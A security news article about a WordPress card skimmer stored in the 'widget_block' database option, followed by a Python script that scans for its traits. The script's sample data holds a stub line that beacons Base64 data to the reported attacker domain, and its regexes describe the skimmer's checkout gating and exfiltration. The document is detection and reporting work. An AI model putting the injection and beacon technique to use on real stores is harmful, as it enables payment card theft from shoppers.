Covert WordPress Payment Card Skimmer Injects Itself on Checkout Pages, Going Unnoticed

Written by: Lore Apostol, Cybersecurity & Streaming Writer

A sophisticated credit card skimmer malware targeting WordPress websites silently embeds itself into database entries, evading detection by traditional file-scanning tools. It injects malicious JavaScript into the "wp_options" table under the "widget_block" row.

Sucuri’s SiteCheck tool has flagged this malware as "malware.magento_shoplift.273". Detection is based on identifying suspicious scripts, obfuscated patterns, and connections to known malicious domains.

The JavaScript activates only on checkout pages: it dynamically checks whether the page URL contains the keyword "checkout" while excluding "cart", which ensures it runs only when users are about to submit payment details.

[Image] Malicious code embedded in WordPress through the admin panel: JavaScript in an HTML Block widget. Source: Sucuri

From here, the malware hijacks legitimate payment fields to steal data in real time, or generates a convincing fake credit card form mimicking the fields of popular payment processors such as Stripe. Either way, the form captures sensitive payment information, including credit card numbers, expiration dates, CVV codes, and billing details, without alerting the user.

The stolen data is obfuscated using Base64 encoding combined with AES-CBC encryption. These techniques make the collected data appear benign in transit and harder for security analysts to examine.

Data is silently transmitted to attacker-controlled domains, such as "valhafather[.]xyz" and "fqbe23[.]xyz", via the navigator.sendBeacon function, which operates without disrupting user experience.

The malware embeds itself into the HTML block widget through the WordPress admin panel ("wp-admin > widgets"). This vector allows the malware to bypass file-based security scans commonly employed by website owners. 
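Because the payload lives in the database rather than on disk, a file scanner never sees it; the place to look is the widget_block option itself. The following script is an added example, not Sucuri's or WordPress's code: it scans an exported widget_block option for the traits described above (an inline script in a block widget, the "checkout"-but-not-"cart" URL gate, navigator.sendBeacon, Base64/AES-CBC handling, and the two reported domains). It assumes the option has been exported as JSON, for instance with WP-CLI's `wp option get widget_block --format=json`; the sample option below is constructed for the demonstration and the skimmer body is deliberately elided.

```python
"""Scan a WordPress ``widget_block`` option for checkout-skimmer indicators.

Added example, not code from Sucuri or WordPress. Assumes the option was
exported as JSON (e.g. ``wp option get widget_block --format=json``).
"""
import json
import re

# Constructed sample of the widget_block option. Widget "3" carries the
# indicators described in the write-up; the collection code is elided.
SAMPLE_WIDGET_BLOCK = {
    "2": {"content": "<!-- wp:paragraph --><p>Free shipping over $50</p><!-- /wp:paragraph -->"},
    "3": {"content": (
        '<!-- wp:html --><script>'
        'if(location.href.includes("checkout")&&!location.href.includes("cart")){'
        '/* ...collection code elided... */'
        'navigator.sendBeacon("https://valhafather.xyz/",btoa(d))}'
        '</script><!-- /wp:html -->'
    )},
    "_multiwidget": 1,
}

# Exfiltration domains reported in the write-up, kept defanged.
KNOWN_DOMAINS = ("valhafather[.]xyz", "fqbe23[.]xyz")

# Each regex corresponds to one trait of the skimmer described above.
INDICATORS = {
    "inline_script": re.compile(r"<script\b", re.I),
    "checkout_gate": re.compile(r"(?:includes|indexOf)\s*\(\s*['\"]checkout", re.I),
    "cart_exclusion": re.compile(r"!\s*[\w.]+\.(?:includes|indexOf)\s*\(\s*['\"]cart", re.I),
    "send_beacon": re.compile(r"navigator\s*\.\s*sendBeacon"),
    "aes_cbc": re.compile(r"AES-CBC"),
    "base64": re.compile(r"\b(?:btoa|atob)\s*\("),
}


def indicators_for(content: str) -> list[str]:
    """Return the names of every indicator matched by one widget's content."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(content)]
    if any(d.replace("[.]", ".") in content for d in KNOWN_DOMAINS):
        hits.append("known_domain")
    return hits


def scan_widget_block(widgets: dict) -> list[dict]:
    """Flag block widgets that carry an inline script plus at least one skimmer trait."""
    findings = []
    for widget_id, widget in widgets.items():
        if not isinstance(widget, dict):  # skips the "_multiwidget" flag
            continue
        hits = indicators_for(widget.get("content", ""))
        if "inline_script" not in hits or len(hits) < 2:
            continue
        # A known domain, or the checkout gate together with sendBeacon,
        # matches the reported campaign closely enough to rate as high.
        high = "known_domain" in hits or {"checkout_gate", "send_beacon"} <= set(hits)
        findings.append({"widget": widget_id, "indicators": hits,
                         "severity": "high" if high else "medium"})
    return findings


def scan_widget_block_json(text: str) -> list[dict]:
    """Run the same scan over the raw JSON text WP-CLI prints."""
    return scan_widget_block(json.loads(text))


if __name__ == "__main__":
    for f in scan_widget_block(SAMPLE_WIDGET_BLOCK):
        print(f"widget {f['widget']}: {f['severity']} -> {', '.join(f['indicators'])}")
```

Any inline `<script>` in a block widget is worth a look on a store that does not intentionally ship custom JavaScript, so the threshold here is deliberately low; the same regexes can be pointed at other database-resident content (post content, theme customizer options) where a file scanner is equally blind.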

Although only two websites are currently known to be infected, the implications are severe. This malware effectively targets checkout pages, compromising sensitive payment information, security codes, and personal details without detection, which attackers can use for fraudulent transactions or sell on underground markets. 

Last year, over 6,000 WordPress sites worldwide were compromised, leading to the installation of malicious plugins designed to push info-stealers. 



For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: